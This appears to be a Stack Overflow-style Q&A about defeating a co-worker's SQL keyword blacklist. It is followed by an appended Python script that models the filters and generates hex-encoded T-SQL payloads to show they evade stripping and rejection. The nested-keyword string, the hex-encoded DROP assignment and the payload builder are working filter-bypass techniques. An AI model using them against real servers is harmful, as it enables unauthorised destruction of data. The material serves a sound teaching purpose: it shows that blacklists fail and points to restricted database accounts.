8

My co-worker is being unsafe with his code and is allowing a user to upload an SQL file to be run on the server. He strips out any key words in the file such as "EXEC", "DROP", "UPDATE", "INSERT", "TRUNC"

I want to show him the error of his ways by exploiting his EXEC ( @sql )

My first attempt will be with 'EXEXECEC (N''SELECT ''You DRDROPOPped the ball Bob!'')'

But he might filter that all out in a loop.

Is there a way I can exploit my co-worker's code? Or is filtering out the key words enough?

Edit: I got him to check in his code. If the code contains a keyword he does not execute it. I'm still trying to figure out how to exploit this using the binary conversion.

5 Comments
  • +1 For such an awesome question. We should exploit our co-workers more often. Commented Sep 16, 2010 at 22:32
  • Just give us the URL and log the uploads! Commented Sep 16, 2010 at 22:36
  • As for your first attempt: are you telling us your co-worker still tries to execute a piece of uploaded code after he found an EXEC there? Commented Sep 16, 2010 at 22:41
  • I'm not sure exactly how he does it at the moment. He forgot to add the files with the validation to subversion :( so I can't check up on him. Commented Sep 16, 2010 at 23:00
  • But yes, coders daft enough to think they can blacklist their way out of this situation quite often employ approaches like naïve stripping. Commented Sep 16, 2010 at 23:15

2 Answers

5
  1. Tell your co-worker he's a moron.

  2. Do an obfuscated SQL query, something like:

    select @sql = 0x44524f5020426f627350616e7473   -- the hex decodes to: DROP BobsPants

This will need some tweaking depending on what the rest of the code looks like, but the idea is to encode your code in hex and execute it (or rather, let it be executed). There are other ways to obfuscate code to be injected.

You've got a huge security hole there. And the funny part is, this is not even something that needs to be reinvented. The proper way to stop such things from happening is to create and use an account with the correct permissions (e.g. one that can only perform select queries on tables x, y and z).


2 Comments

he hee - just in case you didn't know, that hex, when translated into ASCII, translates to drop bobspants
Good call on the user account. That will solve his issue for sure.
1

Have a look at ASCII Encoded/Binary attacks ...

should convince your friend he is doomed.. ;)

And here some help on how to encode the strings ..
Converting a String to HEX in SQL
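As an added example that is not part of the question or either answer: the Python below models the three filter variants the question describes (strip once, strip in a loop, reject the file on any keyword) together with the hex-encoding trick from the first answer and the string-to-hex step the second answer links to. The filter functions, their case-insensitive substring matching and the `select @sql = ...` shape of the upload are assumptions about the co-worker's code, which the page never shows; the blacklist is the one listed in the question, which notably omits DELETE, ALTER and CREATE.

```python
import re

# Blacklist exactly as the question lists it. What is absent from it
# (DELETE, ALTER, CREATE, GRANT, ...) is a flaw before any encoding is tried.
BLACKLIST = ("EXEC", "DROP", "UPDATE", "INSERT", "TRUNC")


def strip_keywords_once(sql: str) -> str:
    """Variant 1 from the question: remove each keyword once.
    Assumed case-insensitive. Defeated by nesting: 'EXEXECEC' -> 'EXEC'."""
    for kw in BLACKLIST:
        sql = re.sub(re.escape(kw), "", sql, flags=re.IGNORECASE)
    return sql


def strip_keywords_loop(sql: str) -> str:
    """Variant 2 ("he might filter that all out in a loop"): repeat until the
    text stops changing. Kills nesting, but only sees text the regex sees."""
    while True:
        stripped = strip_keywords_once(sql)
        if stripped == sql:
            return sql
        sql = stripped


def contains_keyword(sql: str) -> bool:
    """Variant 3 (the question's edit): refuse to run the file if any keyword appears."""
    return any(re.search(re.escape(kw), sql, re.IGNORECASE) for kw in BLACKLIST)


def to_tsql_hex(statement: str, unicode: bool = False) -> str:
    """Encode a statement as a T-SQL varbinary literal (0x...). One byte per
    character matches a varchar @sql; unicode=True gives the UTF-16LE bytes
    an nvarchar @sql would need."""
    raw = statement.encode("utf-16-le" if unicode else "ascii")
    return "0x" + raw.hex()


def from_tsql_hex(literal: str, unicode: bool = False) -> str:
    """What the server holds in @sql after the implicit varbinary -> (n)varchar
    conversion of that literal."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-16-le" if unicode else "ascii")


def build_upload(statement: str) -> str:
    """Contents of the uploaded file (assumed shape, following the first answer).
    The server's own EXEC(@sql) is relied on to run it; the assignment is the
    only plaintext SQL left, and hex digits can never spell a blacklisted word."""
    return f"select @sql = {to_tsql_hex(statement)}"


def what_filters_see(statement: str) -> dict:
    """Push one payload through every filter variant and report the outcome."""
    upload = build_upload(statement)
    return {
        "upload": upload,
        "rejected_by_keyword_check": contains_keyword(upload),
        "survives_strip_once": strip_keywords_once(upload) == upload,
        "survives_strip_loop": strip_keywords_loop(upload) == upload,
        "server_executes": from_tsql_hex(upload.split("= ", 1)[1]),
    }


if __name__ == "__main__":
    # The literal from the first answer decodes to what its comment says.
    print(from_tsql_hex("0x44524f5020426f627350616e7473"))
    # Nesting beats the one-pass filter only; the loop reduces it to nothing.
    print(repr(strip_keywords_once("EXEXECEC")), repr(strip_keywords_loop("EXEXECEC")))
    # Hex encoding walks past all three variants.
    for key, value in what_filters_see("DROP TABLE BobsPants").items():
        print(f"{key}: {value}")
```

Two caveats the code makes visible. The bytes are encoded one per character, which matches a varchar `@sql`; an nvarchar variable would need the UTF-16LE form (`unicode=True`). And the upload still leans on the server's own `EXEC(@sql)` to run the decoded string: a file that had to dispatch the string itself, via EXEC or sp_executesql, would contain the substring "exec" and be caught by a substring scan, which is why the first answer says the payload needs tweaking depending on the rest of the code. Neither caveat rescues the blacklist; the fix is the restricted account the first answer describes.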
